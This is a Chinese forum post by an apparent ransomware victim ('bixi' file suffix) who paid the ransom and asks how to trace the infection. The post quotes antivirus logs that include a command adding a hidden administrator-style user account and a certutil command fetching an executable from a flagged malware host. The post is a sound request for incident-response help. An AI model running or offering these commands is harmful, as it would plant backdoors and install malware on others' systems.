后缀 bixi 解密被勒索!! 了几万块!
缴纳赎金后 重新装系统了。现在观察,杀毒软件的日志如下附件
如何找到源头操作目标:【执行】 C:\Windows\System32\net.exe操作目标参数:net user k8h3d k8d3j9SjfS7 /ADD
[注意]APP应用上架合规检测服务,协助应用顺利上架!
2024.10.1 1点中毒,勒索信--见--本楼回复的。附件,发邮件给黑客,说3000美元一个ID,
防护项目:数据库
操作目标:【执行】 C:\Windows\System32\certutil.exe
操作目标参数:certutil -urlcache -split -f http://dl.haqo.net/dll.exe?fr=mssql c:\setupinstalled.exe
操作结果:已阻止
这一条, 这个网站http://dl.haqo.net/dll.exe 杀毒软件 提示是盗号木马,